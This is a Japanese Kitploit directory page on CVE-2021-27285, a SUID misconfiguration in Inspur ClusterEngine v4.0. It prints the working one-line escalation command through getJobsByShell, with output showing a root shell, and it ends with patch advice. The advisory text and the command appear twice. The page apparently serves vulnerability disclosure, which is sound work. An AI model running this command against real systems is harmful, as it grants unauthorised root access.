Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/fjh1997/cve-2021-27285
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-27285

Inspur ClusterEngineクラスタ管理プラットフォームは、Inspur TianSuoシリーズのHPC製品向けにカスタマイズされたジョブ管理ソフトウェアです。Inspur ClusterEngineにはSUID設定の不備が存在し、非管理者ユーザーが一部のコンポーネントを介して権限を昇格し、root権限を取得できる問題があります。

Inspur ClusterEngine v4.0には、コンポーネント「/opt/tsce4/torque6/bin/getJobsByShell」におけるSUID設定の不備が存在し、非管理者ユーザーがSUIDを介した権限昇格によってroot権限を取得できます。

権限昇格のプロセスは以下のとおりです:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修正提案: 関連コンポーネントをアップグレードしてください

Inspur ClusterEngineクラスタ管理プラットフォームは、Inspur TianSuoシリーズのHPC製品専用に設計されたジョブ管理ソフトウェアです。Inspur ClusterEngineのSUID設定の不備により、非管理者ユーザーが特定のコンポーネントを通じて権限を昇格し、rootアクセスを取得できる可能性があります。

Inspur ClusterEngine v4.0には、コンポーネント「/opt/tsce4/torque6/bin/getJobsByShell」における不適切なSUID設定の問題があり、非管理者ユーザーがSUIDメカニズムを介して権限を昇格し、rootアクセスを取得できます。

権限昇格のプロセスは以下のとおりです:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

アドバイザリー: 関連コンポーネントにパッチを適用してください。

ツールをダウンロード